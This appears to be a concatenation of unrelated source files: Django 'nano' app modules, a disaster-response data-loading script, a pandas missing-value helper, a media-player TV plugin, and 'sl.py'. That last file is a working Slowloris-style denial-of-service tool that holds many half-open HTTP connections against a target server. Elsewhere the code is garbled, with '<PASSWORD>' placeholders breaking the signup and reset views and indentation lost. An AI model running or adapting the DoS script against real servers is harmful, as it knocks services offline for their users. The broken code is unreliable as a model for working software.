plural = 's' if num_levels > 1 else ''
badge_list.append(inner_template % (level, num_levels, name, plural, symbol, num_levels))
return badge_list
@register.simple_tag
def show_badges(user):
outer_template = '<span>%s</span>'
badge_list = get_badges_for_user(user)
if badge_list:
return outer_template % '\xa0'.join(badge_list)
return ''
@register.simple_tag
def show_badges_as_table(user, cols=4):
outer_template = '<table>%s</table>'
cell = '<td>%s</td>'
row = '<tr>%s</tr>\n'
single_col = '<tr><td>%s</td></tr>\n'
badge_list = get_badges_for_user(user)
if cols == 1:
return [single_col % badge for badge in badge_list]
elif cols > 1:
piecesize = int(ceil(len(badge_list) / float(cols)))
        badge_lists = list(grouper(piecesize, badge_list))
outer = []
go_over = list(range(cols))
for p in range(piecesize):
inner = []
for i in go_over:
                inner.append(cell % badge_lists[i][p])
outer.append(row % ''.join(inner))
return outer_template % ''.join(outer)
@register.simple_tag
def show_badge(badge):
if not badge: return ''
template = '<span class="badge"><a href="%(link)s"><span class="b%(level)i" >%(symbol)s</span> %(name)s</a></span>'
fillin = {
'level': badge.level,
'symbol': SYMBOLS[badge.level],
'name': badge.name,
'link': reverse('badge-detail', args=[badge.id]),
}
return template % fillin
@register.simple_tag
def show_badge_and_freq(badge):
template = '<span class="badge-freq">%s (%i)</span>'
badge_text = show_badge(badge)
return template % (badge_text, badge.receivers.count())
```
#### File: nano/badge/tests.py
```python
from __future__ import unicode_literals
from django.test import TestCase
from django.contrib.auth.models import User
from nano.badge.models import Badge
from nano.badge import add_badge, batchbadge
from nano.badge.views import ListBadgeView
class BadgeTest(TestCase):
def test_str(self):
item = Badge(name='test', description='Test')
self.assertEqual(str(item), item.name)
class BadgeManagerTest(TestCase):
def setUp(self):
self.badge = Badge.objects.create(name='test', description='Test')
self.users = []
for i in range(10):
self.users.append(User.objects.create(username='user%i' % i))
for user in self.users[:5]:
self.badge.receivers.add(user)
def test_get_all_recipients(self):
result = list(Badge.objects.get_all_recipients())
self.assertEqual(result, self.users[:5])
def test_get_all_nonrecipients(self):
result = list(Badge.objects.get_all_nonrecipients())
self.assertEqual(result, self.users[5:])
class BadgeFunctionsTest(TestCase):
def setUp(self):
self.badge = Badge.objects.create(name='test', description='Test')
self.users = []
for i in range(10):
self.users.append(User.objects.create(username='user%i' % i))
for user in self.users[:2]:
self.badge.receivers.add(user)
def test_add_badge(self):
add_badge(self.badge, self.users[2])
self.assertEqual(list(self.users[2].badges.all()), [self.badge])
add_badge(self.badge, self.users[0])
self.assertEqual(list(self.users[0].badges.all()), [self.badge])
def test_batchbadge(self):
self.assertEqual(list(self.badge.receivers.all()), self.users[:2])
batchbadge(self.badge, User.objects.all())
self.assertEqual(list(self.badge.receivers.all()), self.users)
class BadgeMixinTest(TestCase):
def test_get_context_data(self):
bm = ListBadgeView()
bm.object_list = None # set during as_view in 1.6
context = bm.get_context_data(object_list=None) # argument in 1.5
self.assertEqual(context['me'], 'badge')
```
#### File: nano/blog/tools.py
```python
from datetime import timedelta
from django.utils.timezone import now as tznow
from django.template.loader import render_to_string
from nano.blog.models import Entry as _Entry
from nano.blog.settings import NANO_BLOG_TAGS, NANO_BLOG_SPECIAL_TAGS
_five_minutes = timedelta(seconds=5*60)
def add_entry_to_blog(obj, headline, template, date_field='last_modified'):
"""Auto-blog about <obj>
obj: object to blog about
headline: string w/o html
template: template, given the context 'obj' mapping to the object
date_field: date_field on object to be used for publishing date
"""
data = {'obj': obj}
current_time = tznow()
template = render_to_string(template, dictionary=data)
pub_date = obj.__dict__.get(date_field, current_time)
latest = _Entry.objects.latest()
# Prevent duplicates
if not (latest.headline == headline and latest.pub_date > current_time - _five_minutes):
blog_entry = _Entry.objects.create(content=template,headline=headline,pub_date=pub_date)
return blog_entry
def get_nano_blog_entries(special_tags=NANO_BLOG_SPECIAL_TAGS, cutoff=2):
"""Fetch <cutoff> number of most recent blog entries and split out
entries tagged with <special_tags>.
cutoff: integer, default 2
special_tags: iterable collection of strings, default NANO_BLOG_SPECIAL_TAGS
"""
special_news = ()
news = _Entry.objects
if NANO_BLOG_TAGS:
special_news = news.filter(tags__slug__in=special_tags)
special_news = special_news.order_by('-pub_date')[:cutoff]
if special_news:
news = news.exclude(id__in=[e.id for e in special_news])
else:
news = news.all()
news = news.order_by('-pub_date')[:cutoff]
return news, special_news
```
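A sketch of how these helpers are meant to be called: `add_entry_to_blog()` right after saving some object, and `get_nano_blog_entries()` from a view. The model, headline and template path below are placeholders:
```python
# Hypothetical callers for the helpers above.
from nano.blog.tools import add_entry_to_blog, get_nano_blog_entries

def announce(obj):
    # `obj` stands in for any model instance with a `last_modified` field;
    # the template is rendered with {'obj': obj}.
    add_entry_to_blog(
        obj,
        headline="New item: %s" % obj,
        template="blog/new_item.html",        # placeholder template path
        date_field="last_modified",
    )

def frontpage_news():
    news, special_news = get_nano_blog_entries(cutoff=2)
    return {"news": news, "special_news": special_news}
```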
#### File: nano/blog/views.py
```python
import datetime
from django.views.generic import ListView
from django.views.generic import (ArchiveIndexView,
YearArchiveView,
MonthArchiveView,
DayArchiveView,
TodayArchiveView,
)
from nano.blog.models import Entry
class BlogMixin(object):
queryset = Entry.objects.all().order_by('-pub_date')
def get_context_data(self, **kwargs):
context = super(BlogMixin, self).get_context_data(**kwargs)
context['me'] = 'news'
context['now_today'] = datetime.date.today()
context['latest'] = self.get_queryset()[:30]
return context
class BlogDateMixin(BlogMixin):
date_field = 'pub_date'
class MonthBlogMixin(BlogDateMixin):
allow_empty = True
month_format = '%m'
class ListBlogView(BlogMixin, ListView):
pass
list_entries = ListBlogView.as_view()
class YearBlogView(BlogDateMixin, YearArchiveView):
allow_empty = True
make_object_list = True
list_entries_by_year = YearBlogView.as_view()
class MonthBlogView(MonthBlogMixin, MonthArchiveView):
pass
list_entries_by_year_and_month = MonthBlogView.as_view()
class DayBlogView(MonthBlogMixin, DayArchiveView):
    pass
list_entries_by_date = DayBlogView.as_view()
class TodayBlogView(MonthBlogMixin, TodayArchiveView):
    pass
list_entries_for_today = TodayBlogView.as_view()
class LatestBlogView(BlogDateMixin, ArchiveIndexView):
pass
list_latest_entries = LatestBlogView.as_view()
```
#### File: nano/chunk/loaders.py
```python
from django.apps import apps
from django.conf import settings
from django.template import TemplateDoesNotExist
from django.utils._os import safe_join
from django.template.loaders.base import Loader
class ChunkLoader(Loader):
is_usable = True
def load_template_source(self, template_name, template_dirs=None):
chunk_model = apps.get_model('chunk', 'Chunk')
try:
chunk = chunk_model.objects.get(slug=template_name)
return (chunk.content, template_name)
except chunk_model.DoesNotExist:
error_msg = "Couldn't find a chunk named %s" % template_name
raise TemplateDoesNotExist(error_msg)
```
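To enable `ChunkLoader` in a project, it has to be listed among the template loaders in the settings; roughly like this sketch (loader order and the other loaders listed are project choices):
```python
# Hypothetical settings.py fragment enabling the ChunkLoader.
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "OPTIONS": {
            # When "loaders" is set explicitly, APP_DIRS must be left out.
            "loaders": [
                "django.template.loaders.filesystem.Loader",
                "django.template.loaders.app_directories.Loader",
                "nano.chunk.loaders.ChunkLoader",   # database-backed chunks tried last
            ],
        },
    },
]
# A Chunk with slug "footer" can then be rendered like any template name:
#   from django.template.loader import render_to_string
#   render_to_string("footer")
```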
#### File: nano/chunk/models.py
```python
from __future__ import unicode_literals
from django.utils.encoding import python_2_unicode_compatible
from django.db import models
@python_2_unicode_compatible
class Chunk(models.Model):
slug = models.SlugField()
content = models.TextField()
class Meta:
db_table = 'nano_chunk_chunk'
def __str__(self):
return self.slug
```
#### File: nano/chunk/tests.py
```python
from __future__ import unicode_literals
from django.test import TestCase
from django.template.engine import Engine
from django.template import TemplateDoesNotExist
from nano.chunk.models import Chunk
class ChunkTest(TestCase):
def setUp(self):
engine = Engine(loaders=['nano.chunk.loaders.ChunkLoader'])
self.loader = engine.template_loaders[0]
def test_str(self):
item = Chunk(slug='test', content='Test')
self.assertEqual(str(item), item.slug)
def test_non_existing(self):
with self.assertRaises(TemplateDoesNotExist):
self.loader.load_template_source("not-existing.html")
def test_existing(self):
content = 'Test!'
template_name = 'test'
chunk = Chunk.objects.create(slug=template_name, content=content)
result = self.loader.load_template_source("test")
self.assertEqual(result[0], content)
self.assertEqual(result[1], template_name)
```
#### File: nano/faq/models.py
```python
from __future__ import unicode_literals
from django.utils.encoding import python_2_unicode_compatible
from django.utils.timezone import now as tznow
from django.db import models
@python_2_unicode_compatible
class QA(models.Model):
question = models.CharField(max_length=255)
answer = models.TextField()
last_modified = models.DateTimeField(default=tznow, editable=False)
class Meta:
db_table = 'nano_faq_qa'
def __str__(self):
return self.question
def save(self, *args, **kwargs):
self.last_modified = tznow()
super(QA, self).save(*args, **kwargs)
```
#### File: nano/mark/models.py
```python
from __future__ import unicode_literals
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
from django.utils.timezone import now as tznow
from django.template.defaultfilters import slugify
from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
#from django.conf import settings
from nano.tools.models import GenericForeignKeyAbstractModel
from nano.mark.managers import MarksManager
class MarkedMixin(models.Model):
"Used by marked models"
class Meta:
abstract = True
def marks(self):
ct = ContentType.objects.get_for_model(self)
return Mark.objects.filter(content_type = ct, object_pk = six.text_type(self.pk))
def flagged(self):
return self.marks.filter(marktype__slug='flag')
def faved(self):
return self.marks.filter(marktype__slug='fave')
def scrambled(self):
return self.marks.filter(marktype__slug='scrambled')
def removed(self):
return self.marks.filter(marktype__slug='removed')
@property
def hidden(self):
marks = self.marks.filter(marktype__slug='flag')
return True if marks.filter(marktype__hide=True) else False
@python_2_unicode_compatible
class MarkType(models.Model):
name = models.CharField(max_length=32)
slug = models.SlugField(unique=True)
hide = models.BooleanField(default=False)
verify = models.BooleanField(default=False)
permanent = models.BooleanField(default=False)
class Meta:
db_table='nano_mark_marktype'
def __str__(self):
return self.name
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super(MarkType, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Mark(GenericForeignKeyAbstractModel):
marked_by = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_('user'), related_name="marks")
marked_at = models.DateTimeField(_('date/time marked'), default=tznow)
marktype = models.ForeignKey(MarkType)
comment = models.CharField(max_length=256, blank=True, null=True)
objects = MarksManager()
    class Meta:
        db_table = 'nano_mark'
        ordering = ('marked_at',)
        get_latest_by = 'marked_at'
def __str__(self):
return "%s have marked %s" % (self.marked_by, self.content_object)
def save(self, parent=None, *args, **kwargs):
if self.marked_at is None:
self.marked_at = tznow()
super(Mark, self).save(*args, **kwargs)
```
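A short sketch of how a model can opt into marking via `MarkedMixin`; the `Post` model below is hypothetical and not part of nano:
```python
# Hypothetical model using MarkedMixin; post.marks() returns the generic Mark
# rows attached to that instance via its content type and object_pk.
from django.db import models
from nano.mark.models import MarkedMixin

class Post(MarkedMixin, models.Model):
    title = models.CharField(max_length=100)

    def __str__(self):
        return self.title
```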
#### File: mark/templatetags/nano_mark_tags.py
```python
from django.template import Library, Context
from django.template.loader import get_template
from django.contrib.contenttypes.models import ContentType
from nano.mark.models import MarkType, Mark
register = Library()
@register.inclusion_tag('nano/mark/mark.html', takes_context=True)
def mark(context, model, type="flag"):
ok_type = MarkType.objects.filter(slug=type)
model_pk = model.pk
ct = ContentType.objects.get_for_model(model)
model_type = ct.id
status = Mark.objects.filter(object_pk=str(model_pk), content_type=ct).count()
request = context['request']
user = request.user
next = request.path
return {
'model_pk': model_pk,
'model_type': model_type,
'type': type if ok_type else "flag",
'unique_id': '%s_%s' % (type, model_pk),
'user': user,
'next': next,
'status': status,
}
@register.inclusion_tag('nano/mark/mark_faved.html', takes_context=True)
def mark_faved(context, model):
return mark(context, model, 'fave')
```
#### File: nano/tools/middleware.py
```python
from django.views.debug import technical_500_response
import sys
# Django snippet
# Author: zbyte64
# Posted: July 31, 2008
class UserBasedExceptionMiddleware(object):
def process_exception(self, request, exception):
if request.user.is_superuser:
return technical_500_response(request, *sys.exc_info())
```
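This is old-style middleware (no `MiddlewareMixin`), so on the Django versions this code targets it would be registered roughly as below; the surrounding entries are only an example:
```python
# settings.py sketch for the legacy middleware API this class implements.
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'nano.tools.middleware.UserBasedExceptionMiddleware',
)
```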
#### File: nano/tools/models.py
```python
from __future__ import unicode_literals
from django.utils import six
from django.conf import settings
from django.core import urlresolvers
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.contenttypes import fields as generic
class UnorderedTreeManager(models.Manager):
def roots(self):
"Return a list of tree roots, nodes having no parents"
return self.get_queryset().filter(part_of__isnull=True)
class UnorderedTreeMixin(models.Model):
part_of = models.ForeignKey('self', blank=True, null=True, default=None, related_name='has_%(class)s_children')
path = models.CharField(max_length=255, blank=True, default='')
tree = UnorderedTreeManager()
_sep = '/'
class Meta:
abstract = True
def save(self, *args, **kwargs):
if not self.id:
super(UnorderedTreeMixin, self).save(*args, **kwargs)
self._set_path()
super(UnorderedTreeMixin, self).save(*args, **kwargs)
def _set_path(self):
if self.part_of:
self.path = "%s%i/" % (self.part_of.path, self.id)
else:
self.path = "%i/" % self.id
@property
def level(self):
"Count how far down in the tree self is"
return six.text_type(self.path).count(self._sep)
def roots(self):
"Get all roots, nodes without parents"
return self._default_manager.filter(part_of__isnull=True)
def get_path(self):
"Get all ancestors, ordered from root to self"
return [self._default_manager.get(id=p) for p in six.text_type(self.path).split(self._sep) if p]
def descendants(self):
"Get all descendants in no particular order"
return self._default_manager.filter(path__startswith=self.path).exclude(id=self.id)
def parent(self):
"Get parent of self"
return self.part_of
def siblings(self):
"Get all nodes with the same parent"
if not self.part_of: return []
return [p for p in self.part_of.descendants() if p.level == self.level]
def children(self):
"Get nodes that have self as parent"
return [p for p in self.descendants() if p.level == self.level + 1]
def is_sibling_of(self, node):
"Check if <node> has the same parent as self"
return self.part_of == node.part_of
def is_child_of(self, node):
"Check if <node> is the parent of self"
return self.part_of == node
def is_root(self):
"""Check if self is a root. Roots have no parents"""
return not bool(self.part_of)
def is_leaf(self):
"""Check if self is a leaf. Leaves have no descendants"""
return self.descendants().count() == 0
class AbstractText(models.Model):
"Denormalized storage of text"
DEFAULT_TYPE = 'plaintext'
text = models.TextField()
text_formatted = models.TextField(editable=False)
text_type = models.CharField(max_length=64, default=DEFAULT_TYPE)
class Meta:
abstract = True
def save(self, formatters=None, *args, **kwargs):
if self.text_type == self.DEFAULT_TYPE:
self.text_formatted = self.text
else:
if formatters:
self.text_formatted = formatters(self.text_type)
super(AbstractText, self).save(*args, **kwargs)
class GenericForeignKeyAbstractModel(models.Model):
"""
An abstract base class for models with one GenericForeignKey
"""
# Content-object field
content_type = models.ForeignKey('contenttypes.ContentType', verbose_name=_('content type'), related_name="content_type_set_for_%(class)s")
object_pk = models.TextField(_('object ID'))
content_object = generic.GenericForeignKey(ct_field="content_type", fk_field="object_pk")
class Meta:
abstract = True
```
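A sketch of a concrete tree model built on `UnorderedTreeMixin`, showing how `path` and `level` behave; the `Category` model and the ids in the comments are hypothetical:
```python
# Hypothetical subclass of UnorderedTreeMixin.
from django.db import models
from nano.tools.models import UnorderedTreeMixin

class Category(UnorderedTreeMixin):
    name = models.CharField(max_length=50)

# root = Category(name='root'); root.save()                    # path e.g. "1/"
# child = Category(name='child', part_of=root); child.save()   # path e.g. "1/2/"
# root.is_root() -> True, child.level -> 2,
# root.descendants() -> queryset containing child
```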
#### File: tools/templatetags/nano_tags.py
```python
from __future__ import unicode_literals
from math import modf, floor, ceil
from django import template
from django.template.defaultfilters import stringfilter
from nano.tools import grouper
register = template.Library()
@register.filter
def startswith(value, arg):
"""Usage {% if value|startswith:"arg" %}"""
if value:
return value.startswith(arg)
return False
startswith.is_safe = True
@register.filter
def endswith(value, arg):
"""Usage {% if value|endswith:"arg" %}"""
if value:
return value.endswith(arg)
return False
endswith.is_safe = True
@register.filter
@stringfilter
def nbr(text):
"""Replace whitespace with non-breaking-space"""
pieces = text.split()
text = '\xa0'.join(pieces)
return text.encode('utf8')
nbr.is_safe = True
@register.filter
def partition(iterable, cols=4):
"Split an iterable into columns"
if not iterable:
return ()
try:
cols = int(cols)
except (ValueError, TypeError):
return None
the_tuple = tuple(iterable)
maxrows = int(ceil(len(the_tuple)/float(cols)))
columns = grouper(maxrows, the_tuple)
return zip(*tuple(columns))
partition.is_safe = True
@register.filter
def integer(text):
"Get integer-part of float"
_, integer = modf(float(text))
return str(int(integer))
integer.is_safe = True
@register.filter
def fraction(text, arg=1):
"Get fractional part of float, pad with zeroes until <arg> length"
arg = int(arg)
fraction, _ = modf(float(text))
integer, fraction = str(fraction).split('.', 1)
lf = len(fraction)
fraction = fraction[:arg]
if arg > lf:
fraction = '%s%s' % (fraction, '0'*(arg-lf))
return fraction
fraction.is_safe = True
@register.inclusion_tag('come_back.html', takes_context=True)
def come_back(context):
"""Turn current url path into a query-part for use in urls
With default template:
If the path is stored in the context as /foo/bar, tag returns '?next=/foo/bar'
"""
whereami = context.get('whereami')
request = context.get('request')
if request:
path_info = request.META.get('PATH_INFO')
return { 'come_back': whereami or path_info or '' }
```
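These are ordinary template filters, but the numeric ones can also be exercised directly from Python (assuming nano is importable); the expected results are noted in the comments:
```python
# Direct calls to the filters defined above.
from nano.tools.templatetags.nano_tags import integer, fraction, startswith

integer('3.75')           # -> '3'
fraction('3.75', 3)       # -> '750' (fractional digits, zero-padded to length 3)
startswith('nano', 'na')  # -> True
```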
#### File: nano/user/tests.py
```python
from django.utils.timezone import now as tznow
from django.test import TestCase
from nano.faq.models import QA
class QATest(TestCase):
def test_str(self):
item = QA(question='blbl', answer='fofo')
self.assertEqual(str(item), item.question)
def test_save(self):
item = QA(question='blbl', answer='fofo')
item.save()
self.assertNotEqual(item.last_modified, None)
```
#### File: nano/user/views.py
```python
from __future__ import unicode_literals
from random import choice, sample
import string
from django.utils.timezone import now as tznow
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
from django.contrib.auth import get_user_model
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render
from django.template.defaultfilters import slugify
from nano.tools import pop_error, get_profile_model, asciify
from nano.user.forms import SignupForm, PasswordChangeForm, PasswordResetForm
from nano.user import new_user_created
import logging
_LOG = logging.getLogger(__name__)
class NanoUserError(Exception):
pass
class NanoUserExistsError(NanoUserError):
pass
# def pop_error(request):
# error = request.session.get('error', None)
# if 'error' in request.session:
# del request.session['error']
# return error
def random_password():
sample_space = string.ascii_letters + string.digits + r'!#$%&()*+,-.:;=?_'
outlist = []
for i in range(1,8):
chars = sample(sample_space, 2)
outlist.extend(chars)
return ''.join(outlist)
def make_user(username, password, email=None, request=None):
User = get_user_model()
try:
User.objects.get(username=username)
except User.DoesNotExist:
# make user
user = User(username=username[:30])
user.set_password(password)
user.is_staff = False
user.is_superuser = False
user.is_active = True
if email:
user.email = email
user.save()
# Create profile
Profile = get_profile_model(raise_on_error=False)
if Profile:
profile = Profile(user=user, display_name=username)
profile.save()
# Don't signal creation of test users
test_users = getattr(settings, 'NANO_USER_TEST_USERS', ())
for test_user in test_users:
if user.username.startswith(test_user):
break
else:
new_user_created.send(sender=User, user=user)
if request is not None:
infomsg = 'You\'re now registered, as "%s"' % username
messages.info(request, infomsg)
_LOG.debug('Created user: %s/%s' % (user, user.check_password(password)))
return user
else:
raise NanoUserExistsError("The username '%s' is already in use by somebody else" % username)
def signup(request, template_name='signup.html', *args, **kwargs):
me = 'people'
error = pop_error(request)
data = {
'me': me,
'error': error,
'form': SignupForm()
}
if request.method == 'POST':
form = SignupForm(data=request.POST)
if form.is_valid():
username = asciify(form.cleaned_data['username'])
password = <PASSWORD>.cleaned_data['<PASSWORD>']
email = form.cleaned_data['email'].strip() or ''
errormsg = 'Username "%s" is taken'
# check that username not taken
userslug = slugify(username)
Profile = get_profile_model(raise_on_error=False)
if Profile.objects.filter(slug=userslug).count():
# error!
safe_username = slugify('%s-%s' % (username, str(tznow())))
changed_warningmsg = errormsg + ", changed it to '%s'."
messages.warning(request, changed_warningmsg % (username, safe_username))
username = safe_username
# make user
try:
user = make_user(username, password, email=email, request=request)
            except NanoUserExistsError:
                # the username already exists, so redirect to that user's profile
                existing_user = get_user_model().objects.get(username=username)
                next_profile = Profile.objects.get(user=existing_user).get_absolute_url()
                return HttpResponseRedirect(next_profile)
else:
# fake authentication, avoid a db-lookup/thread-trouble/
# race conditions
user.backend = 'django.contrib.auth.backends.ModelBackend'
_LOG.debug('Attempting login of: %s' % user)
login(request, user)
nexthop = getattr(settings, 'NANO_USER_SIGNUP_NEXT', reverse('nano_user_signup_done'))
try:
nexthop_profile = Profile.objects.get(user=user).get_absolute_url()
return HttpResponseRedirect(nexthop_profile)
except Profile.DoesNotExist:
pass
return HttpResponseRedirect(nexthop)
_LOG.debug('Should never end up here')
return render(request, template_name, data)
@login_required
def password_change(request, *args, **kwargs):
error = pop_error(request)
template_name = 'password_change_form.html'
if request.method == "POST":
form = PasswordChangeForm(request.POST)
if form.is_valid():
password = form.cleaned_data['<PASSWORD>']
user = request.user
user.set_password(password)
user.save()
request.session['error'] = None
return HttpResponseRedirect('/password/change/done/')
else:
form = PasswordChangeForm()
data = { 'form': form,
'error': error,}
return render(request, template_name, data)
def password_reset(request, project_name='Nano', *args, **kwargs):
User = get_user_model()
error = pop_error(request)
template = 'password_reset_form.html'
e_template = 'password_reset.txt'
help_message = None
e_subject = '%s password assistance' % project_name
e_message = """Your new password is:
%%s
It is long deliberately, so change it to
something you'll be able to remember.
%s' little password-bot
""" % project_name
e_from = getattr(settings, 'NANO_USER_EMAIL_SENDER', '')
form = PasswordResetForm()
if e_from and request.method == 'POST':
form = PasswordResetForm(request.POST)
if form.is_valid():
user = get_object_or_404(User, username=form.cleaned_data['username'])
if user.email:
tmp_pwd = <PASSWORD>()
user.set_password(<PASSWORD>)
result = send_mail(subject=e_subject, from_email=e_from, message=e_message % tmp_pwd, recipient_list=(user.email,))
user.save()
request.session['error'] = None
return HttpResponseRedirect('/password/reset/sent/')
else:
error = """There's no email-address registered for '%s',
the password can't be reset.""" % user.username
request.session['error'] = error
data = {'form': form,
'help_message': help_message,
'error':error}
return render(request, template, data)
``` |
{
"source": "786country/emegency_pipeline",
"score": 3
} |
#### File: emegency_pipeline/data/process_data.py
```python
import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
"""Load data for disaster management datasets and merge datasets.
Args:
messages_filepath (str): messages.csv filepath
categories_filepath (str): categories.csv filepath
Returns:
dataframe: merged datasets
"""
messages = pd.read_csv(messages_filepath)
categories = pd.read_csv(categories_filepath)
categories = categories.categories.str.split(';',expand=True)
row = categories.iloc[0].tolist()
category_colnames = [i[:-2] for i in row]
categories.columns = category_colnames
for column in categories:
# set each value to be the last character of the string
categories[column] = categories[column].str[-1:]
# convert column from string to numeric
categories[column] = categories[column].astype(float)
df = pd.concat([messages, categories], axis=1)
return df
def clean_data(df):
"""Clean merged dataset.
Args:
df (dataframe): merged dataset
Returns:
dataframe: dataset removed of duplicates
"""
df = df[~df.duplicated()]
return df
def save_data(df, database_filename):
"""Save data to sqllite db.
Args:
df (dataframe): dataframe required for saving into db
database_filename (str): database filename of db
"""
engine = create_engine(f'sqlite:///{database_filename}')
df.to_sql(database_filename, engine, index=False, if_exists='replace')
def main():
"""Ochestrate code execution."""
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
# Load data from csv
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
# Clean data
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
        # Save data in sqlite db
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '\
'datasets as the first and second argument respectively, as '\
'well as the filepath of the database to save the cleaned data '\
'to as the third argument. \n\nExample: python process_data.py '\
'disaster_messages.csv disaster_categories.csv '\
'DisasterResponse.db')
if __name__ == '__main__':
main()
``` |
{
"source": "786country/lending_club",
"score": 4
} |
#### File: 786country/lending_club/functions.py
```python
import pandas as pd
def missing_zero_values_table(df):
"""To summarise missing values in one dataframe.
Args:
df (dataframe): dataframe missing value analysis is required on
Returns:
dataframe: dataframe containing missing value analysis
"""
# https://stackoverflow.com/questions/51070985/find-out-the-percentage-of-missing-values-in-each-column-in-the-given-dataset
zero_val = (df == 0.00).astype(int).sum(axis=0)
mis_val = df.isnull().sum()
mis_val_percent = 100 * df.isnull().sum() / len(df)
mz_table = pd.concat([zero_val, mis_val, mis_val_percent], axis=1)
mz_table = mz_table.rename(
columns={0: "Zero Values", 1: "Missing Values", 2: "% of Total Values"}
)
mz_table["Total Zero Missing Values"] = (
mz_table["Zero Values"] + mz_table["Missing Values"]
)
mz_table["% Total Zero Missing Values"] = (
100 * mz_table["Total Zero Missing Values"] / len(df)
)
mz_table["Data Type"] = df.dtypes
mz_table = (
mz_table[mz_table.iloc[:, 1] != 0]
.sort_values("% of Total Values", ascending=False)
.round(1)
)
print(
"Your selected dataframe has "
+ str(df.shape[1])
+ " columns and "
+ str(df.shape[0])
+ " Rows.\n"
"There are " + str(mz_table.shape[0]) +
" columns that have missing values."
)
return mz_table
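
# A minimal usage sketch (not part of the original module): build a toy frame
# with zeros and NaNs and print the missing-value summary it produces.
if __name__ == "__main__":
    toy = pd.DataFrame({"a": [0, 1, None], "b": [None, None, 3.0]})
    print(missing_zero_values_table(toy))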
``` |
{
"source": "789it789/sl.py",
"score": 3
} |
#### File: 789it789/sl.py/sl.py
```python
import socket, random, time, sys, argparse
parser = argparse.ArgumentParser()
parser.add_argument('host', nargs="?")
parser.add_argument('-p', '--port', default=80, type=int)
parser.add_argument('-s', '--sockets', default=150, type=int)
args = parser.parse_args()
if len(sys.argv)<=1:
sys.exit(1)
if not args.host:
sys.exit(1)
list_of_sockets = []
user_agents = ["Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"]
def init_socket(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)
s.connect((ip,args.port))
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
return s
def main():
ip = args.host
socket_count = args.sockets
print("The target server {} is being tested with {} sockets".format(ip, socket_count))
for _ in range(socket_count):
try:
print("Creating socket: {}".format(_ + 1))
sys.stdout.flush()
s = init_socket(ip)
except socket.error:
break
list_of_sockets.append(s)
while True:
print("Finished, Socket count: {}".format(len(list_of_sockets)))
for s in list(list_of_sockets):
try:
s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
except socket.error:
list_of_sockets.remove(s)
for _ in range(socket_count - len(list_of_sockets)):
print("Recreating socket: {}".format(_ + 1))
sys.stdout.flush()
try:
s = init_socket(ip)
if s:
list_of_sockets.append(s)
except socket.error:
break
time.sleep(15)
if __name__ == "__main__":
main()
``` |
{
"source": "791377533/stellar-watch-tv",
"score": 2
} |
#### File: 791377533/stellar-watch-tv/main.py
```python
import StellarPlayer
from .m3uParse import m3uParse
class weishiplugin(StellarPlayer.IStellarPlayerPlugin):
def __init__(self,player:StellarPlayer.IStellarPlayer):
super().__init__(player)
print("init weishi plugin")
self.list_weishi = []
self.list_weishi_name = []
def show(self):
print('ui start')
test = m3uParse()
filePath = __file__
pos = filePath.rindex('\\')
filePath2 = filePath[0:pos]
newFilePath = filePath2 + "\\" + "weishi.m3u"
self.list_weishi = test.openFile(newFilePath)
self.list_weishi_name = test.getListName()
list_item_layout = [
[
{'type': 'space', 'width': 5},
{
'group': [
{'type': 'button', 'name': 'weishi', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6},
{'type': 'button', 'name': 'weishi1', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6},
{'type': 'button', 'name': 'weishi2', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6},
{'type': 'button', 'name': 'weishi3', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6},
{'type': 'button', 'name': 'weishi4', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6}
], 'dir': 'hertical'
}
]
]
controls = [
{'type':'space','height':10},
[
{'type':'space','width':10},
{'type':'list','name':'list1','itemheight':30,'itemlayout':list_item_layout,'value':self.list_weishi_name,'marginSize':3},
{'type':'space','width':10}
],
{'type':'space','height':10}
]
result, controls = self.player.doModal('test', 740, 750, '我要看电视', controls)
print(f'{result=},{controls=}')
def onListItemClick(self, page, control, item):
print(f'onListItemClick,{control=},{item=}')
def onListItemControlClick(self, page, listControl, item, itemControl):
keyName = self.list_weishi_name[item]
key = ""
index = 0
print(f'onListItemControlClick,{item=}')
if itemControl == 'weishi':
key = keyName["weishi"]
index = (item + 1) * 5 - 5
elif itemControl == 'weishi1':
key = keyName["weishi1"]
index = (item + 1) * 5 - 4
elif itemControl == 'weishi2':
key = keyName["weishi2"]
index = (item + 1) * 5 - 3
elif itemControl == 'weishi3':
key = keyName["weishi3"]
index = (item + 1) * 5 - 2
elif itemControl == 'weishi4':
key = keyName["weishi4"]
index = (item + 1) * 5 - 1
